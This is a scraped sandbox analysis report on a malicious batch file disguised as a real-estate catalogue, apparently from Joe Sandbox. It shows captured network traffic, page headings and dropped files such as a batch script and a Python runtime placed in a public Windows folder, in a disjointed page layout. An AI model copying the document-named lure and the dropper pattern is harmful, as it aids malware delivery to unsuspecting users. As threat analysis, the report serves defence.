2024-12-04 11:20:20 UTC	1369	IN	Data Raw: dc f1 83 cd 20 f0 18 aa 88 02 1f e9 29 cb 73 99 17 0a a7 2b d6 9c 28 d9 24 97 d3 4d 9a 49 7d 26 f6 6d 65 16 fb 35 94 45 c9 77 01 5d f9 7c a4 b1 60 fb 21 9b ba 13 b5 fa b3 d0 a8 5b 69 24 cb dd 62 fb 11 44 e4 3a 61 9d 94 49 55 15 b2 71 4f a0 a3 a3 b0 3d 7f 5e 7e 28 8b d6 b0 40 30 ba a6 d7 4d 83 49 92 e0 3c 02 a6 e5 a8 7b 21 3b 19 42 b7 0f be a9 87 b1 16 ac a2 53 62 ed 14 4c 31 cd 56 80 5b 21 e3 2f b5 1c 47 ac 61 a3 8b 3c 4f 5d 71 c3 27 c4 0c f6 f2 90 0c e5 c4 6f 68 32 eb 62 ff d2 ae ef 11 6d 63 16 6e c8 3d 8e 38 17 3b 52 cc 61 05 68 17 ab f7 62 e8 8c 58 ba a0 73 ce 5a 86 41 c7 e4 02 4f 03 f4 81 75 47 98 c1 b9 93 af 85 df 9f ff ed cd 0f 8f d8 eb 1f 9e f7 4a 71 8a 93 2f d3 0a e3 66 91 2f eb 05 26 88 19 f5 14 c9 3e 3a ee bb cd df 6f ea e5 05 0f d7 fd 3a 03 27 Data Ascii: )s+($MI}&me5Ew]\|`![i$bD:aIUqO=^~(@0MI<{!;BSbL1V[!/Ga<O]q'oh2bmcn=8;RahbXsZAOuGJq/f/&>:o:'
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 59 21 39 52 d2 a2 a0 4c 88 30 11 32 42 51 dd 1c 27 7d 76 08 a1 4d 2a e2 dd ba 95 30 c6 a7 75 5e 15 b9 9e 8a 38 8f 3b 05 30 3a d3 e1 5e 1d 17 0f 62 61 11 e5 cc d6 70 97 91 a1 cf 42 97 42 c8 99 36 08 d7 d3 0c 3d e7 e1 d7 f4 39 65 89 f6 7e 8b 97 18 5a ee 9d 5d e8 db b2 ed 2b b2 3d ab 90 55 82 1d d0 e8 ed 23 8d ec 34 c0 46 a6 65 32 56 c8 f6 50 de 23 dd 81 02 b9 0a 85 5d 1c de 76 0f 1b d9 9b 7e e1 16 8f 4f 42 17 67 3a 60 6f d3 77 f1 32 4d 1f 0a 4b 66 6c f9 47 d2 59 a4 4a 0d 49 84 e6 4d 33 c7 4e fe af 17 a1 7e b5 02 de fd 95 f0 cd d3 35 ef 12 46 21 fe a0 cc 2d 50 67 51 48 d6 97 d7 8f e3 3f 49 51 24 d7 81 e2 c9 12 c8 2d df e6 c5 f5 87 94 cb 6b 1e 47 8b a4 ac f0 2e 98 60 be c3 21 36 14 7c 26 52 d3 33 c9 70 5f d7 40 5a f0 66 1e 1b ab 90 34 9e f3 8e ef 62 5b 2a 39 Data Ascii: Y!9RL02BQ'}vM0u^8;0:^bapBB6=9e~Z]+=U#4Fe2VP#]v~OBg:`ow2MKflGYJIM3N~5F!-PgQH?IQ$-kG.`!6\|&R3p_@Zf4b[9
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: a4 d9 6c a6 96 d9 ea a7 ae ae cd 8f bf 50 ce e6 ba 1c 25 c5 c5 87 b7 93 47 f6 86 b9 7a ac f6 ef 7b 77 eb b2 b8 bb e4 db bc bc 8b 3e e7 2e a5 ca ef ce 93 c5 5a 9e 33 11 6d 57 b4 15 a5 71 ca f3 03 94 81 15 23 9e 89 df 75 c6 13 2d 2b 8b de ae c0 8b 39 0e e4 af 43 1f 0c 01 d1 20 78 6b d5 52 23 84 77 e1 57 04 5e fa 55 66 c1 ab 93 6d 21 b4 95 cc 56 d0 d6 d9 bf 10 de aa 4a 55 f0 d6 e9 bd 10 5e 2f a4 0c bc 39 4a 19 07 27 db 75 c1 f5 ed 61 96 55 68 79 4f 1f f9 45 0f 17 ce 78 4c df b9 6f 25 29 f9 13 a9 40 e6 c2 ff 15 0c 33 72 17 99 f8 81 54 1c b9 8b 88 fb bc 18 99 ea 39 e2 56 1d 1a 8c ec 5f c6 6f 82 55 1f f5 e3 50 23 eb 72 ac c9 78 ea e7 07 2c 01 a0 22 47 2e 61 b2 3f 91 fb 5d 0d e7 ad 3f 12 a9 c5 f4 3d b8 a3 11 9a db 7f 00 50 4b 07 08 96 8a 74 7f d4 1b 00 00 10 83 Data Ascii: lP%Gz{w>.Z3mWq#u-+9C xkR#wW^Ufm!VJU^/9J'uaUhyOExLo%)@3rT9V_oUP#rx,"G.a?]?=PKt
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 47 4f ba 51 f1 04 40 8e f1 8d 90 6c 12 7e be da 34 5d 05 40 88 a9 78 f1 ac 1a 5c bf c4 0b 8e d1 76 87 8b 4d bd 2a 56 9b b2 eb aa 4e 2d 14 9f 05 8a d9 ac 40 60 06 44 61 9e 9a 85 b5 6b 0c 06 06 52 9b 5c 7f f3 e2 b4 23 9e 14 22 09 03 97 17 8d 59 35 86 2a b7 dd 14 91 f1 e6 65 02 f3 7f dd ac 61 05 1c 3a b3 b8 cd 84 ee 9a dd 61 53 ee 15 2c 68 c6 5c 7b 5b 9b 85 5c ae 80 23 3b c4 e6 e8 a2 9e c3 48 b6 09 60 4c 7d 85 41 bd 7d df bc 23 24 0c fd de 57 2d 31 38 ce 1c 31 bb 03 e3 51 c1 90 a6 41 61 75 f1 e7 6a b5 67 24 f7 fb b6 be 38 98 f5 38 8f c9 fc a2 6d 1b 4b e5 ea c3 aa c2 51 14 6d 59 03 11 2e ee c2 f9 20 c0 1d f0 9a 3f 94 16 d0 33 20 00 5e 47 1d 3b 6a 8d 3a 21 d5 bc 78 41 5f 70 0f b7 d7 86 73 1d 20 91 a2 6a 39 b3 50 31 b0 57 e5 e1 ea 7a 9f 40 0a 28 5e dd 00 93 af Data Ascii: GOQ@l~4]@x\vMVN-@`DakR\#"Y5ea:aS,h\{[\#;H`L}A}#$W-181QAaujg$88mKQmY. ?3 ^G;j:!xA_ps j9P1Wz@(^
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 78 4c a2 e8 18 f2 09 03 df d4 dd 7e 4c 44 17 7e 33 e7 e0 1b 43 f7 18 52 1f 9c 33 96 b1 f8 f1 aa d9 dd 2d 09 0c fe af 7c 6f 28 84 7f 83 8a f5 aa d9 56 69 30 f0 e7 63 5c 72 00 47 d9 a5 f0 a8 0a 2a 81 2c 69 d6 c1 47 28 92 7c 85 5c c0 58 2d 19 3e a9 f7 00 66 5b 55 6b 01 04 27 3b ad ed 09 23 76 db 91 91 ec 48 9d b9 80 fa ba da 18 15 b4 06 55 82 76 00 60 5f b3 76 ab 35 ac dd c3 ce 9e e3 8c 16 b1 32 22 6c 6e 07 8d eb 90 28 01 08 00 d4 78 e8 f8 fe ec 84 09 c0 5d 00 05 e8 01 7f 05 0f e6 f0 3f 0c 8f a8 1e 49 61 78 f4 5b a7 4e c2 f6 9c fc 4a a4 b3 b7 7f c7 a2 d9 69 65 78 54 a9 b6 55 5b 22 60 df 2e 87 44 b6 9a 26 ea af c2 f5 c2 4c af 81 ea 40 28 14 51 a8 ac 19 8a 10 12 f0 0f a5 9a 89 b2 67 b4 3a 73 f8 64 2d 9a 84 3c 6b af bc 31 e0 a1 0d 89 8f 60 02 f5 34 ab e2 65 e4 Data Ascii: xL~LD~3CR3-\|o(Vi0c\rG*,iG(\|\X->f[Uk';#vHUv`_v52"ln(x]?Iax[NJiexTU["`.D&L@(Qg:sd-<k1`4e

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nXZkSH4goDyyokB&MD=w198Tw2D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-04 11:20:20 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: f7af4078-d3d0-42b2-9f01-209656587135 MS-RequestId: f668aeae-ae73-407c-a3f5-ab479d80a6ee MS-CV: gZhU5I++YEaP/1bg.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 04 Dec 2024 11:20:19 GMT Connection: close Content-Length: 24490
2024-12-04 11:20:20 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-12-04 11:20:20 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:21 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112020Z-1746fd949bdtlp5chC1EWRq1v400000000z0000000008nxb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:21 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\libs.bat

C:\Users\Public\python39\DLLs\_asyncio.pyd

C:\Users\Public\python39\DLLs\_bz2.pyd

C:\Users\Public\python39\DLLs\_ctypes.pyd

C:\Users\Public\python39\DLLs\_ctypes_test.pyd

C:\Users\Public\python39\DLLs\_elementtree.pyd

C:\Users\Public\python39\DLLs\_hashlib.pyd

C:\Users\Public\python39\DLLs\_lzma.pyd

C:\Users\Public\python39\DLLs\_msi.pyd

C:\Users\Public\python39\DLLs\_multiprocessing.pyd

C:\Users\Public\python39\DLLs\_overlapped.pyd

Windows Analysis Report
Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

C:\Users\Public\python39\Lib\future.py

C:\Users\Public\python39\Lib\phello.foo.py

C:\Users\Public\python39\Lib\pycache\future.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\future.cpython-39.pyc.1294205164464

C:\Users\Public\python39\Lib\pycache\_bootlocale.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\_bootlocale.cpython-39.pyc.1294161957680

C:\Users\Public\python39\Lib\pycache\_collections_abc.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\_collections_abc.cpython-39.pyc.1294158280240

C:\Users\Public\python39\Lib\pycache\_compression.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\_compression.cpython-39.pyc.1294168343856

C:\Users\Public\python39\Lib\pycache\_sitebuiltins.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\_sitebuiltins.cpython-39.pyc.1294162033712

C:\Users\Public\python39\Lib\pycache\_weakrefset.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\_weakrefset.cpython-39.pyc.1294168344368

C:\Users\Public\python39\Lib\pycache\abc.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\abc.cpython-39.pyc.1294156787360

C:\Users\Public\python39\Lib\pycache\ast.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\base64.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\base64.cpython-39.pyc.1294161876896

C:\Users\Public\python39\Lib\pycache\bisect.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\bisect.cpython-39.pyc.1294168727824

C:\Users\Public\python39\Lib\pycache\bz2.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\bz2.cpython-39.pyc.1294163485504

C:\Users\Public\python39\Lib\pycache\calendar.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\calendar.cpython-39.pyc.1294204438320

C:\Users\Public\python39\Lib\pycache\codecs.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\codecs.cpython-39.pyc.1294156785792

C:\Users\Public\python39\Lib\pycache\contextlib.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\contextlib.cpython-39.pyc.1294169047472

C:\Users\Public\python39\Lib\pycache\copy.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\copy.cpython-39.pyc.1294207444784

C:\Users\Public\python39\Lib\pycache\copyreg.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\copyreg.cpython-39.pyc.1294158332736

C:\Users\Public\python39\Lib\pycache\dataclasses.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\datetime.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\datetime.cpython-39.pyc.1294163475760

C:\Users\Public\python39\Lib\pycache\dis.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\enum.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\enum.cpython-39.pyc.1294162041408

C:\Users\Public\python39\Lib\pycache\fnmatch.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\fnmatch.cpython-39.pyc.1294163419856

C:\Users\Public\python39\Lib\pycache\functools.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\functools.cpython-39.pyc.1294162032944

C:\Users\Public\python39\Lib\pycache\genericpath.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\genericpath.cpython-39.pyc.1294162033712

C:\Users\Public\python39\Lib\pycache\getpass.cpython-39.pyc.1294210229168

C:\Users\Public\python39\Lib\pycache\hashlib.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\hashlib.cpython-39.pyc.1294204407120

C:\Users\Public\python39\Lib\pycache\heapq.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\heapq.cpython-39.pyc.1294163422880

C:\Users\Public\python39\Lib\pycache\hmac.cpython-39.pyc

C:\Users\Public\python39\Lib\pycache\hmac.cpython-39.pyc.1294206934688

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:21 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112020Z-1746fd949bdlnsqphC1EWRurw000000000z0000000005daa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:21 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:21 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112020Z-1746fd949bddgsvjhC1EWRum2c00000001f00000000025px x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:21 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:21 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112020Z-1746fd949bd2cq7chC1EWRnx9g00000000vg0000000018pa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:21 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:21 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112020Z-1746fd949bdb8xvchC1EWRmbd4000000014g000000002eu4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:21 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Timestamp	Bytes transferred	Direction	Data
